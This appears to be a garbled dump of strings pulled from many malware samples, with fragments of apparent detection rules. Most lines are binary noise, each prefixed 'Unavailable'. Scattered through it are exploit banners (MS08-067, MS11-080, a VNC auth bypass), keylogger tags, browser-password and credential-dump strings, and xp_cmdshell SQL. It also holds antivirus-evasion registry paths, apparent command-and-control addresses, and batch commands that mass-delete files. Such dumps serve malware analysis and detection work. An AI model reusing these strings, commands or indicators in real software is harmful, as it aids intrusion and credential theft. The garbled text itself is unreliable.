Unavailable |$8l
Unavailable 9.}i
Unavailable a*ve
Unavailable t;r
Unavailable >cy#c
Unavailable t_ooww3=xxwxpy50ppz5jqp_-ys,a1ea5y852cp4z4pp-pv40p-bou
Unavailable 807x
Unavailable s/v#q
Unavailable w%&c
Unavailable so3:
Unavailable ))<%b
Unavailable n"ql4t
Unavailable fe98t'
Unavailable p*`f
Unavailable bxsi
Unavailable http://www.wasabii.com.tw 0'wymajtec$tima stempijg sarviges ga -$g2ahdneafe1.syssotefehj3.sysmainsys64.sys\
Unavailable tpb9e
Unavailable [ eyf
Unavailable ?r;v
Unavailable ru_9
Unavailable {*eh
Unavailable {d+mb)
Unavailable 5l @
Unavailable \gt.
Unavailable ad1)/*
Unavailable (2"8
Unavailable u(d]f
Unavailable hpxc
Unavailable moc{jj
Unavailable upsqr
Unavailable ik@/d
Unavailable getprocessheap
Unavailable !%sja%g1\\\\.\\pipe\\x141_stdin\\\\.\\pipe\\x141_stdout\
Unavailable net serviceshellcreator2.propertiesset_ivsmartcopy2.propertieszhuframeworkunable to resolve [ %s ]. errorcode %dyour target's ip is : %sraw tcp socket created successfully.n
Unavailable \\systemroot\\system32\\ci.dll\\sysnative\\ci.dllmozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/36.0.1985.125 safari/537.36crtdll.dllinternetopena coolio, trying open %s029.hdlhttp.execontent-disposition: form-data; name=\"file1\"; filename=\"%s\"%allusersprofile%\\accessories\\wordpade.exe\\dumps.dat\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|ckanbh9fnmxgjcsbxx5nfs+8s7abcq==ckanbhfln1nxmccr0rlbmq==select * from moz_logins;makescr.dat%s\\mozilla\\firefox\\profiles.ini?moz-proxy://[%s-%s] title: %scforeign key mismatch - \"%w\" referencing \"%w\"windows 95 sr2\\|%s|0|0|c:\\users\\john\\desktop\\potplayer\\release\\potplayer.pdbpotplayer.dll\\update.datht_exploitht_exploitflash_exploit_exp1_fla/maintimelineexp2_fla/maintimeline_shellcode_32todo: unknown 32-bit targeth
Unavailable getmodulehandleexw
Unavailable 5z1@
Unavailable 1u,9
Unavailable ]30+
Unavailable hau?
Unavailable isdebuggerpresent
Unavailable hk#=\
Unavailable gh+a
Unavailable '[=i
Unavailable ukfo
Unavailable g[vs
Unavailable aqon.
Unavailable gv9e
Unavailable **gh
Unavailable xt6<m%g7k^d4.7xdtp28i!c3gz@0*3t@
Unavailable }!(!
Unavailable spd5j
Unavailable =s6)
Unavailable ~-qvd
Unavailable long
Unavailable pmg.
Unavailable 'p8gswse]
Unavailable 1.+b
Unavailable 3>fvw
Unavailable l$8h
Unavailable w9.'
Unavailable 9t6a
Unavailable rr"dl
Unavailable `hstalhthin
Unavailable a_a^a\_^
Unavailable qn/}
Unavailable ;|v+
Unavailable http://extcitrix.we11point.com/vpn/index.php?ref=1%systemroot%\\system32\\svchost.exe -k msupdatemanagement support team1dtoptoolz co.,ltd.0seoul1hello world!conin$setconsolemodegetenvironmentstringsgetfiletypeheapcreatevirtualfreegetoemcpflushfilebufferssetstdhandleextension: .jpgyahoo kec\\control\\zxplughttp://www.facebook.com/comment/update.exeshared a shell to %s:%s successfullyapplication/x-ms-applicationapplication/x-ms-xbapapplication/vnd.ms-xpsdocumentapplication/xaml+xmlapplication/x-shockwave-flashimage/pjpegset return time error = %d!set return time success!quit success!msn.klmwmsn.klmbms.klmerror %u while loading tsu.dll %lsgetmodulefilename() failed => %ut
Unavailable ^]yf
Unavailable ~01wb
Unavailable vr.>t
Unavailable iecomdll.datc
Unavailable ^<v7w
Unavailable <kha$
Unavailable km=#j
Unavailable 2#5s
Unavailable t$x^
Unavailable ro^^jozor
Unavailable strf
Unavailable e) ,
Unavailable 4tsp
Unavailable @8t$p@
Unavailable rb{0li6
Unavailable soj!w
Unavailable `yw#
Unavailable ecrnlgy
Unavailable fqfy
Unavailable k,=bf
Unavailable {+$.
Unavailable k=yi
Unavailable wwpack32 decompression routine version 1.12
Unavailable *68c
Unavailable 6^bp
Unavailable imn;
Unavailable d$5i
Unavailable v"st
Unavailable km1!
Unavailable 1v.%>
Unavailable h$sc
Unavailable 3!]negp
Unavailable du" c
Unavailable &^: l
Unavailable #z5m
Unavailable c/nu]
Unavailable <~~-
Unavailable .nr5
Unavailable get_badloginaddressget_lastfailedloginads_uf_encrypted_text_password_allowedget_passwordexpirationdatebin_execsql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + bin_textbox_saveptc.text=\"<a href=\\\"javascript:bin_postback('zcg_closepm','\"+bin_tobase64(de.key.tostring())+\"')\\\">close</a>\";bin_execsql(\"if object_id('bin_temp')is not null drop table bin_temp\");-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] transmitport invalid.[+] waiting for client on port:%d ......\\setup.exemsi.dll.urlutmsi.dllutsetup.exeut/c del /q %sp
Unavailable copy_file_to_system.exemozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)!his=9!wn=!flof=!fil=!ps=i am so sad!i am so happy!jdk541please input file to bind and destination file name!%[^:]:%d,%d,%drun ok!installlocationdisplayversiondisplaynamewininet.dll internetopena internetconnecta httpopenrequesta httpsendrequesta httpqueryinfoa internetreadfile internetclosehandle
Unavailable l$$2
Unavailable pr2*
Unavailable h+m?
Unavailable - rewritten by hdm last <hdm [at] metasploit.com>- usage: %s <target id> <target ip>- remote dcom rpc buffer overflow exploit- warning:this code is more like a dos tool!(modify by pingker)windows nt sp6 (chinese)- original code by flashsky and benjurry\
Unavailable :-"\w
Unavailable ;mor
Unavailable ckxxwn
Unavailable 93>g
Unavailable t$8a
Unavailable const
Unavailable wi)[
Unavailable vq^g
Unavailable software\\microsoft\\windows nt\\currentversion\\winlogon\\notify<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestversion=\"1.0\"><trustinfo xmlns=\"urn:schemas-microsoft-com:asm.v3<supportedos id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedos>getpassword1nvsmartmax.dlllicensedlgc
Unavailable :k\`l)
Unavailable steam_ker.dllfor /f %%a in (host.txt) do (for /f \"eol=s tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txtdel host.txt /qfor /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txtstart http.exe %%a %http%del result.txt s2.txt s1.txt nc [-options] hostname port[s] [ports] ... gethostpoop fuxoredvernotsupported%s [%s] %d (%s) `--%s' doesn't allow an argumentms08-067 exploit for cn by emm@ph4nt0m.orgmake smb connection error:%dsend payload over!maybe patched!rpcexceptioncode() = %up
Unavailable virtual
Unavailable /bbs/info.asp\\msinfo.exe%s\\%srcs.pdf\\aumlib.ini9/f30li5ubo5dnaddxg8s762tqy=
Unavailable 'u[d
Unavailable u)gg
Unavailable 00dc(
Unavailable s&kp
Unavailable r)"-
Unavailable qh.4
Unavailable getcommandlinew
Unavailable 37*f
Unavailable bk)x=
Unavailable tuxv
Unavailable "@^9
Unavailable &h]u$
Unavailable 2]8{
Unavailable <<6u
Unavailable cmd=getload&login=&run=ok&run=fail&removed=ok[iisend=0x%08x][recv:] 0x%08x %siiscmd error:%dnot support this function!imgurl=http://%s/%04d-%02d/%04d%02d%02d%02d%02d%02d.png&w=800&h=600&ei=png&w=800&h=600&ei=cnjcucsbl4rfkqx444hycw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty={\\rtf1\\ansi\\ansicpg936\\uc2\\deff0\\stshfdbch13\\stshfloch0\\{\\*\\panose 02020603050405020304}times new roman
Unavailable guangzhou yuanluo technology co.guangzhou yuanluo technology co.,ltd$asahi kasei microdevices corporation0\
Unavailable cy4tottmpmtthvforrlmddnikx%s.identifier%d:%i64u:%s%s;%s%.2d-%.2d-%.4d[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d][backspace][tab][arrow left][arrow up][arrow right][arrow down][home][page up][page down][break][print screen][scroll lock][caps lock][alt][esc][ctrl+%c]n
Unavailable w(00dc
Unavailable 9*~83
Unavailable rof2z
Unavailable isequalguid
Unavailable snpo
Unavailable d$4d
Unavailable cli::pin_ptr<
Unavailable %w?t
Unavailable |!x[,
Unavailable }$ls
Unavailable setpixel
Unavailable 4e#r
Unavailable vol+
Unavailable cgk>1
Unavailable (fd~
Unavailable c:\\windows\\system32\\cmd.exeinflate 1.1.3 copyright 1995-1998 mark adlerbindercarrier.pdb\\stringfileinfo\\040904b0\\companyname\\stringfileinfo\\040904b0\\internalname\\stringfileinfo\\040904b0\\filedescriptioncreateobject(\"wscript.shell\").run \"%s %s\"tmp.vbstmp1.vbsfiremalv\\firemalv\
Unavailable [[[i
Unavailable azzymutex\
Unavailable g0%o
Unavailable &'(e
Unavailable t.x,
Unavailable a local variable was used before it was initialized
Unavailable ta?s
Unavailable ow)>wwdt
Unavailable h?,4
Unavailable a* $
Unavailable k.jj=,
Unavailable xl/vbaproject.bin
Unavailable h`>g,s
Unavailable wc#q
Unavailable r ce
Unavailable fxsu]
Unavailable :%:0:;:f:q:\\:p:|:6.666>6f6n6v6^6f6n6v6~66!6(6/666=6d6k6r6y6r6:71t83jl.bjg6!61666v6]6p62%2d2p2`2p2|242494@4g4n4u4\\4c4j4q4x49+92999@9g9n9u9\\9c9j9q9x94!4&43484e4j4w4\\4i4n4s45$5+52595@5g5n5u5\\5c5j5q51.252<2c2j2q2x2_2f2m2t2{28 8%818:8?8k8q8v8b8h8m8y89'93989=9b9k9p9u9z9c9n9s9:\":':,:8:=:b:r:z:`:e:v:}:=#=(=4=:=?=k=q=v=b=k=p=|== =*=1=8=?=f=m=t=[=b=i=p=w=~=3&3-343;3b3i3p3w3^3e3l3s3z3:!:(:/:6:=:i:n:s:`:f:k:x:~:cmdkajy==#=/=4=9=e=j=o=[=`=e=q=v={=
Unavailable cpes
Unavailable ker.%h
Unavailable 3)6{
Unavailable *loz
Unavailable zi/
Unavailable +rq*
Unavailable qwwl
Unavailable .xsq
Unavailable !c^z
Unavailable )zxk
Unavailable 7&t~
Unavailable |6~2|
Unavailable a8 t
Unavailable d6w(
Unavailable 00dcw
Unavailable bdvs},ge
Unavailable a a#
Unavailable _ey_q1s
Unavailable d$0d
Unavailable fvzn
Unavailable kma#v
Unavailable +68es|3y
Unavailable 8'>0
Unavailable y-]eaek
Unavailable \>(j
Unavailable 2!0j
Unavailable -0["x
Unavailable getmaingcqcdqbde@gcqgqydv_b}e\\dy@\\uufu^dcc_s[ud***
Unavailable 9{]f
Unavailable =#00dc
Unavailable b&3|8
Unavailable #,ug
Unavailable pn{i4
Unavailable yt(;].*
Unavailable :54o
Unavailable v0q[s
Unavailable ;h$c
Unavailable ~zwo
Unavailable 0hoc
Unavailable ",yu
Unavailable .data
Unavailable 4e[%n
Unavailable d$0fd
Unavailable --av
Unavailable comparestringex
Unavailable hlgibg
Unavailable b8sq
Unavailable sysinit
Unavailable =m_g
Unavailable is,!kx
Unavailable ?xs=a
Unavailable mbvo
Unavailable >2hk
Unavailable ldexp
Unavailable advj
Unavailable n+rp
Unavailable host: %ws:%dschannel.dll\\microsoft\\internet explorer\\conhost.exe\\microsoft\\internet explorer\\dll2.xor\\microsoft\\internet explorer\\hook.dll\\microsoft\\internet explorer\\main.dll\\microsoft\\internet explorer\\nvsvc.exe\\microsoft\\internet explorer\\sbiedll.dll\\microsoft\\internet explorer\\mon\\microsoft\\internet explorer\\runas.exesoftware\\360safe\\liveupsoftware\\360safesoftware\\kingsoft\\antivirussoftware\\avira\\avira destopsoftware\\rising\\ravsoftware\\jiangminsoftware\\micropoint\\anti-attackf
Unavailable z[$p
Unavailable aaaaaaia
Unavailable $eyf/
Unavailable t$(i;
Unavailable r00dc
Unavailable e"wo
Unavailable >$57
Unavailable 5h @
Unavailable r'z
Unavailable ,hy9
Unavailable +tq&d
Unavailable !mpy%
Unavailable d$dd
Unavailable b&thu
Unavailable hl @
Unavailable pswh
Unavailable (/mfy
Unavailable pxll[;
Unavailable \$$;
Unavailable qivk
Unavailable %-)#[
Unavailable fmhf{
Unavailable ibv9
Unavailable 9 excalibur (c) by forgot/us/dfcg f
Unavailable d$@e3
Unavailable cdr8
Unavailable 0g&5}
Unavailable ss[r
Unavailable yyutvwh
Unavailable )csp
Unavailable dstub
Unavailable d$0i
Unavailable |$8h
Unavailable szdd
Unavailable (t$ph
Unavailable ~lh]
Unavailable d$(hdtc
Unavailable "`<v1
Unavailable yhqb
Unavailable k}-t
Unavailable shellexecutewgetenvironmentvariablewsizeofresourcelockresourceloadresourcefindresourcewr
Unavailable %userprofile%\\iexpl0re.exe\"<770j ((\\users\\%s\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\iexpl0re.lnk\\documents and settings\\%s\\application data\\microsoft\\internet explorer\\iexpl0re.exeloaderv5.dllpost /index%0.9d.asp http/1.1get /search?n=%0.9d&dude_am_i_sharp-3.14159265358979x6.626176who_a_r_e_you?2.99792458x1.25663706143592bastard_&&_bitches_%0.8xc:\\bbb\\eee.txt
Unavailable qft"\
Unavailable `vua`
Unavailable t$ qrvvv
Unavailable h4ym-~7
Unavailable y[_^
Unavailable 32.dadva
Unavailable _filbuf
Unavailable processuseraccountss
Unavailable 7txwi
Unavailable 3$k#
Unavailable hhfc
Unavailable _g0x
Unavailable gk+zjsvd
Unavailable p~{%
Unavailable i[d|g
Unavailable vw8s?
Unavailable m+(&
Unavailable j4w2
Unavailable ~,3ff
Unavailable )xnh
Unavailable w59a
Unavailable - (c) copyright 1998 by anakin
Unavailable _m,*h%
Unavailable s*e*
Unavailable @~1i^
Unavailable 6pv0sn9
Unavailable yvvbc
Unavailable yyf;e
Unavailable __restrict
Unavailable q>bo
Unavailable pwrem
Unavailable d5lx
Unavailable gpx?
Unavailable .9%o
Unavailable 5"r.
Unavailable )~7b
Unavailable ukz]
Unavailable srmj
Unavailable ihl6y
Unavailable )hm(6`
Unavailable gv q
Unavailable beijing1del /f /s /q %systemdrive%\\*.log del /f /s /q %windir%\\*.bak del /f /s /q %systemdrive%\\*.chk del /f /s /q %systemdrive%\\*.tmp del /f /q %userprofile%\\cookies s\\*.* rd /s /q %windir%\\temp & md %windir%\\temp del /f /s /q %systemdrive%\\recycled\\*.* del /f /s /q \"%userprofile%\\local settings\\temp\\*.*\" del /f /s /q \"%userprofile%\\local settings\\temporary internet files\\*.*\" tasklist |find \"clear.bat\"||start clear.bathttp://www.coffeewl.comping -n 2 localhost 1>nul 2>nulfor /l %%a in (mode con: cols=42 lines=5text files (*.txt);;all files (*)http://ubrute.comip - %d; password - %d; combination - %dget_crackedcredentialss
Unavailable gfffa
Unavailable m9xb
Unavailable operator ""
Unavailable o!y|"
Unavailable createpipeenumprocessmodules%s%duserid=%dthreadid=%dgroupid=%dssdpsvc.dllfail %s lsaserviceinit%-8d fs %-12s bs m
Unavailable t$)z'
Unavailable rtlmovememory
Unavailable %s %s %s %s %d %d %d %d %programfiles%\\internet explorer\\iexplore.exemsictl.exe127.0.0.1:8080mshtml.datmsisvc-getmodulefilenameexw:
Unavailable q{y|'
Unavailable t0__xz
Unavailable dv;n
Unavailable h(:@
Unavailable getfiletype
Unavailable 700pp
Unavailable le,,
Unavailable ym~$
Unavailable &;qn
Unavailable qczg
Unavailable f4j<
Unavailable *s"l
Unavailable `x:j]k.~
Unavailable fbgd
Unavailable {%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}wuservicemainc
Unavailable kernl32u
Unavailable "jy8aa
Unavailable s.nah
Unavailable 6al2(r91}
Unavailable xservice for network identification control data
Unavailable uvwh
Unavailable d$vd
Unavailable =r/?
Unavailable h9/t
Unavailable zczv
Unavailable svwu
Unavailable }h]o
Unavailable wvqavqhd
Unavailable o(o$
Unavailable c3rs
Unavailable wordpro
Unavailable [ib,&
Unavailable l&dy{
Unavailable v00dc
Unavailable yb*l
Unavailable pmcc
Unavailable vyop
Unavailable havex--></body></head>answertag_startpath_blockfile~
Unavailable nme 1.1 stubf
Unavailable `local vftable'
Unavailable $@'0
Unavailable b( u
Unavailable d$pf;
Unavailable ]0e8
Unavailable ' was converted using rose's rue! sumsd`
Unavailable k+k=0
Unavailable h@|@
Unavailable trw~
Unavailable }.ds
Unavailable h01wb
Unavailable :hqe;
Unavailable stack around _alloca corrupted
Unavailable ;%yl
Unavailable $ip_padding_dataport_numbpython27.dllemail.header(l
Unavailable ("\k
Unavailable gff8y
Unavailable !nf%/`m
Unavailable i;+x_g
Unavailable prin
Unavailable char
Unavailable \-#cx
Unavailable h`uc
Unavailable .3ac
Unavailable d.=#
Unavailable knc@
Unavailable w/if
Unavailable _tmpr.vbs_tmpg.vbsdtl.dat3c6fb3ca-69b1-454f-8b2f-bd157762810eeed5ca6c-9958-4611-b7a7-1238f2e1b17e8a8ff8ad-d1de-4cef-b87c-82627677662e43ee34a9-9063-4d2c-aacd-f5c62b849089a8859547-c62d-4e8b-a82d-be1479c684c9a59cf429-d0dd-4207-88a1-04090680f714utd_ce31f:\\project\\t5000\\src\\target\\1 kjetdll.pdbl:\\myproject\\vc 7.1\\t5000\\t5000ver1.28\\target\\4 capturedll.pdbf:\\project\\t5000\\src\\target\\4 capturedll.pdbe:\\vs2010\\xplat2\\release\\instres32.pdb%s%s.exe_log.txtopenfilemappingntcreateuserprocessntquerydirectoryfilertlcreateuserthreaddeleteurlcacheentrypr_readbegin public keyp
Unavailable m-me
Unavailable qgah
Unavailable \$`he3
Unavailable 0&x@f;g
Unavailable 9nth
Unavailable _4f=
Unavailable fd9?t&
Unavailable j/ea
Unavailable =!%#oo^
Unavailable yxpq
Unavailable psw3
Unavailable u!&&
Unavailable jo]!w
Unavailable u:yn3
Unavailable bk+%@
Unavailable 'gfu
Unavailable cdpmz
Unavailable etrg
Unavailable eifu
Unavailable swhd
Unavailable d$(l
Unavailable g~}k
Unavailable u?be
Unavailable polycrypt pe (c) 2004-2005, jlabsoftware.
Unavailable ;.u1l
Unavailable 5doj
Unavailable z{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}yuipwdfile0yuipkdfile0yuicrypted0yui1.0post %s http/1.0accept-encoding: identity, *;q=0ke
Unavailable 58b@
Unavailable rtiu
Unavailable 00dc#
Unavailable 7ii*%p
Unavailable "udx
Unavailable i2lc
Unavailable error 2005 recv from server udp - %d\x0aerror 2004 send to tps - %d\x0aerror 2003 recv from tps - %d\x0aerror 2002 send to server udp - %d\x0a
Unavailable _.je,
Unavailable i#9s"
Unavailable __int16
Unavailable n^hy=n
Unavailable 8d,i
Unavailable w@heh
Unavailable n,h))
Unavailable aro<
Unavailable sj62
Unavailable qg;l
Unavailable hphp48-apk
Unavailable fv-dolv
Unavailable (k{r
Unavailable tq.w
Unavailable n&cl
Unavailable april
Unavailable h8\c
Unavailable oazsr
Unavailable _d>[
Unavailable dvz
Unavailable w50en
Unavailable cmu#
Unavailable .b~orxyhi
Unavailable ^w3khd$q
Unavailable s,fa+
Unavailable v+[y
Unavailable }]--x[xa
Unavailable t$`h
Unavailable cdb/
Unavailable __pascal
Unavailable )vwuc
Unavailable 2i\t
Unavailable svw`
Unavailable avauwvsh
Unavailable post http://%s:%d/aspxabcdefg.asp?%s http/1.1get http://%s:%d/aspxabcdef.asp?%s http/1.1s
Unavailable fix<
Unavailable readprocessmemory
Unavailable -zz5n
Unavailable vjh+
Unavailable \\.\fentedevu
Unavailable < t;<
Unavailable l]cw
Unavailable \\aapz.tmpc:\\documents and settings\\a\\\\perform\\release\\perform.pdbb
Unavailable h8uc
Unavailable []_(ei
Unavailable fd9 tmh
Unavailable ;"u1
Unavailable hd%4
Unavailable pr{
Unavailable :h99
Unavailable ^i(&
Unavailable = .[i
Unavailable _! &>
Unavailable 64,f
Unavailable p@yyy_^
Unavailable -pakb
Unavailable hca<h
Unavailable &&reg=
Unavailable kh^l]
Unavailable ?mj??rs
Unavailable ph#1@
Unavailable d$ su
Unavailable j:nf
Unavailable x-b!p_wr^!5gg!
Unavailable k&n]
Unavailable 'c-5?
Unavailable @of"
Unavailable y}}:
Unavailable :2wy/+ni&
Unavailable r[vg
Unavailable qi5m
Unavailable %s%02d.%02d.%02d_%02d.%02d.%02d.skw%
Unavailable logf
Unavailable pipetemp0oo.oczcvoczcvgv&errorlevel=information&wait=yesmozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; .net clr 1.0.4344)appmainservicemain
Unavailable hxld
Unavailable >{a\^@
Unavailable > jo+
Unavailable khh;
Unavailable d08@t
Unavailable jdl4
Unavailable f/|i@
Unavailable admin\\desktop\\babar64\\babar64\\obj\\dllwrapperuser-agent: mozilla/4.0 (compatible; msi 6.0;execqueryfailled!nbot_command_line!!!extract error!!!file does not exists-->[%s]/s /n %s \"%s\"%%windir%%\\%s\\%s/c start /wait (d;oici;fa;;;an)(a;oici;fa;;;bg)(a;oici;fa;;;sy)(a;oici;fa;;;ls)software\\microsoft\\windows\\currentversion\\policies\\system\\%common_appdata%conout$dllpath:\\project\\xaps_xaps_objective.dll" $variant12 = "startuser-agent: mozilla/5.0 (windows nt 6.3; wow64; rv:28.0) gecko/20100101 firefox/28.0is you live?176.31.112.10error in select, errno %d" $mix3 = "no msgerr %di`m waitopenssl 1.0.1e 11 feb 2013" $mix10 = "xtunnel.exe\\\\.\\pipe\\ahexecimplevelproject\\xaps_objective_dll\\.?avagentmoduleremotekeylogger@@<font size=4 color=red>process isn't exist</font>.winnt.check-fix.com.update.adobeincorp.com.microsoft.checkwinframe.coma
Unavailable l$,j
Unavailable j7#z
Unavailable ie)sg4
Unavailable utf-
Unavailable 1og8
Unavailable q.ed
Unavailable ww-lt
Unavailable '_,0q
Unavailable ]$\2(
Unavailable /:{q
Unavailable ;"}nj
Unavailable mjdz
Unavailable medusa has finishedjomo-kun / foofus networksmedusa v.%s./ss 5631 -a green attack pcanywhere in 5 secondsmedusa -h $1.pc -u usersrequires an a network as argumentdamn dude, port numbers are in 1 .. 65535(tcp[tcpflags]=0x12) and (src port %d) and (dst port %d)i:\\ference\\addres\\documents2.pdbid:%lu|bid:%lu|os:%lu|la:%lu|rg:%luid:%lu|tid:%lu|err:%lu|w32:%luid:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%luph5.0
Unavailable l9*u&
Unavailable l(l
Unavailable #qn{
Unavailable xptpsw
Unavailable ddbx
Unavailable l2=a
Unavailable <m{c
Unavailable loader error
Unavailable fd90t
Unavailable getacp
Unavailable (#)y
Unavailable 5jmi
Unavailable %r2@
Unavailable dl?>
Unavailable d$8a
Unavailable 2,lt%bg
Unavailable ex;d
Unavailable :e=)
Unavailable h6*x
Unavailable top!6
Unavailable b7wp
Unavailable x atauavh
Unavailable hp}@
Unavailable pdhkl<"o
Unavailable std::nullptr_t
Unavailable (tt(
Unavailable {#{~
Unavailable # 248y
Unavailable n>kq
Unavailable upgd
Unavailable \x00msvcrt.dll\x00\x00crtdll.dll\x00cygwin1.dllcygwin_internalcygwin_detach_dllmsvcrt.dllmingw-w64 runtime failure:-libgccw32-eh-3-sjlj-gthr-mingw32_mingw32_init_mainargs-libgccw32-eh-2-sjlj-gthr-mingw32mingw runtime failure:autoit has detected the stack has become corrupt.\n\nstack corruption typically occurs when either the wrong calling convention is used or when the function is called with the wrong number of arguments.\n\nautoit supports the __stdcall (winapi) and __cdecl calling conventions. the __stdcall (winapi) convention is used by default but __cdecl can be used instead. see the dllcall() documentation for details on changing the calling convention.autoit errormissing right bracket ')' in expression.missing operator in expression.unbalanced brackets in expression.error parsing function call.>>>autoit no cmdexecute<<<#requireadmin#onautoitstartregister#notrayiconcannot parse #include -- terminating\x0d\x0a\x00 -- terminating\x0a\x00crt: \x00unexpected error\x00unhandled exception (main)\x00unhandled exception in thread\x00unable to create thread\x00unable to destroy semaphore\x00unable to wait on semaphore\x00unable to post semaphore\x00unable to init semaphore\x00unable to unlock mutex\x00unable to lock mutex\x00unable to init mutex\x00invalid stream lock number\x00corrupt per-thread data\x00out of memory\x00unable to init threads\x00unable to init heap\x00qt5core.dll\x00\x00qtcore4.dll\x00`
Unavailable send browser snapshot failedg
Unavailable .0/c
Unavailable d$hh
Unavailable 9{i"
Unavailable d$$%
Unavailable if %1.==. goto ende
Unavailable $uyi
Unavailable uhv a
Unavailable k$ k
Unavailable ]%g.
Unavailable ca18
Unavailable q/kz
Unavailable k7"_01wb
Unavailable mm[{
Unavailable settings
Unavailable y[t1
Unavailable h@e@
Unavailable eroqw112sfsdfrtldecompressbuffers
Unavailable \\domains\\account\\domains\\account\\users\\names\\sid :* ntlm :authentication id :wdigest :\\release\\appinithook.pdbappinithook.dllm
Unavailable .?avdnamenode@@
Unavailable %{g"9
Unavailable yb*t
Unavailable loadlibrarya
Unavailable t/em
Unavailable 5!po#
Unavailable db{#
Unavailable +q}_
Unavailable l1s;!
Unavailable (esc0.1)`h+
Unavailable .g&.k#?
Unavailable global\\m324233333p0global\\mqe45tex13fw14op0global\\654223411804dwinsupdate.tmpwinsups.dllrundll32.exe \"%s\",updateplatformrundll32.exe \"%s\",displayipinjectpkt%
Unavailable g/$@
Unavailable !fp8
Unavailable d$pi
Unavailable o6`n
Unavailable tuuuu
Unavailable noobyprotect
Unavailable @@@std@@\
Unavailable t$xm
Unavailable vos#
Unavailable .(!>
Unavailable queryperformancecounter
Unavailable q(pb
Unavailable struct
Unavailable ya*h
Unavailable *7>&b
Unavailable ,ha7
Unavailable (59gc
Unavailable &93nb-m@
Unavailable 2&e!
Unavailable ~dg2b
Unavailable k/'ds
Unavailable type descriptor'
Unavailable uvwavawh
Unavailable @svwh
Unavailable %kxf
Unavailable |c$4
Unavailable qu^$iz`
Unavailable lxna
Unavailable ddap
Unavailable q]q3m[
Unavailable 3}00dc
Unavailable http://www.hkmjj.com-------
Unavailable 8*!6
Unavailable ke>fvw
Unavailable &kpl
Unavailable 5(0ep2a08
Unavailable eqd:@|
Unavailable @_^]
Unavailable e.fd;e,r
Unavailable 6ymn
Unavailable t1qq,g
Unavailable 2)\lq
Unavailable qon(
Unavailable x)!!e
Unavailable t> b
Unavailable sck_idmodinjpeb
Unavailable 8xhk
Unavailable copyright (c) 1991-1995 by psph
Unavailable f;\$0
Unavailable \$dm
Unavailable 7t|~
Unavailable evy-,
Unavailable utl+
Unavailable :uh`]~
Unavailable 0in>/
Unavailable a`oc+|0
Unavailable ^@>@
Unavailable 4[$.
Unavailable @y9ex3
Unavailable qx&>
Unavailable a}ohd-
Unavailable t$0w
Unavailable _t1l
Unavailable z\zi
Unavailable @>%>b
Unavailable ;00dc
Unavailable wkxk
Unavailable pqrvw
Unavailable &xrp;
Unavailable startservicea
Unavailable />5?
Unavailable vrqsu
Unavailable !a's
Unavailable ,cg9
Unavailable p:/l
Unavailable "=h}
Unavailable _(3 4
Unavailable t[f$
Unavailable c:\\windows\\system32\\command.com /c easy usage version -- edited by: racle@tian6.comoh,sry.too long command.success! commander.hey,how can racle work without ur command ?the exploit thread was unable to map the virtual 8086 address space[+] usage: vnc_bypauth <target> <scantype> <option>========realvnc <= 4.1.1 bypass authentication scanner=======[+] type vnc_bypauth <target>,<scantype> or <option> for more informationsvnc_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection closedprogram termingwww.icehack.yoda & m.o.d.-> come.to/f2f **************c:\\temp\\$530 please login with user and pass._shell.exeftpcwaitingpassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=listviewprocesslistcolumnclick!http://iframe.ip138.com/ic.aspusage : ms11-080.exe cmd.exe command \\ms11080\\ms11080\\debug\\ms11080.pdb[>] by:mer4en7y@90sec.org[>] create porcess error[>] ms11-080 exploitusage:system_exp.exe \"cmd\"the shell \"cmd\" success!not windows nt family os.unable to get kernel base address.run \"%s\" failed,code: %dwindows kernel local privilege exploit h
Unavailable coded by ivanlef0u, shadow3 modifiedwindows 2000 sp4 chinese (before ms07-017)zwvdmcontrol -> my shellcode, modifiable kiservicetablecall shellcode ... find gditableentry ... ok!!!
Unavailable `vtordisp{
Unavailable 8o9
Unavailable hkju
Unavailable yf&%
Unavailable =xt'i
Unavailable d^m]
Unavailable 6fpa
Unavailable copyright
Unavailable biy*
Unavailable w~d/
Unavailable $xxq+
Unavailable @.data
Unavailable h9=89
Unavailable aa< t(<#t
Unavailable elko3
Unavailable %s can't be openednquery cookie failed...query content-length failed...query content-type failed...current process id is %dk8dfagyus83kf05tgdlet64esystem32\\drivers\\a-pi.sys===> <screen%d>n
Unavailable pujx
Unavailable </requestedprivileges>last.inff
Unavailable !$7%
Unavailable |2ob
Unavailable lihz
Unavailable "l+l
Unavailable xfjk
Unavailable kzcn
Unavailable +185.100.84.13458.49.58.58218.1.98.203187.33.33.8185.86.148.22745.32.129.18523.227.196.217p
Unavailable d=1'
Unavailable *5.v
Unavailable hldc
Unavailable voidfuncselect * from win32_service where name ='vss'select * from win32_shadowcopycmd /c mklink /d clientaccessibletcp port scannepusage: %s tcp/syn startip [endip] ports [threads] [/t(n)] [/(h)banner] [/save]\nglobal\\fwtsqmsession106829323_s-1-5-19everyoney0uar3@s!llyid!07,ou74n60u7f001\\kb25468.datnetmgstartnetmgmt.srgprxtroy
Unavailable 6{q%
Unavailable "tog39
Unavailable %'lf
Unavailable h\zc
Unavailable et5>
Unavailable stack around the variable '
Unavailable #ftbqo
Unavailable t>zl
Unavailable %f8mn
Unavailable %?r61o
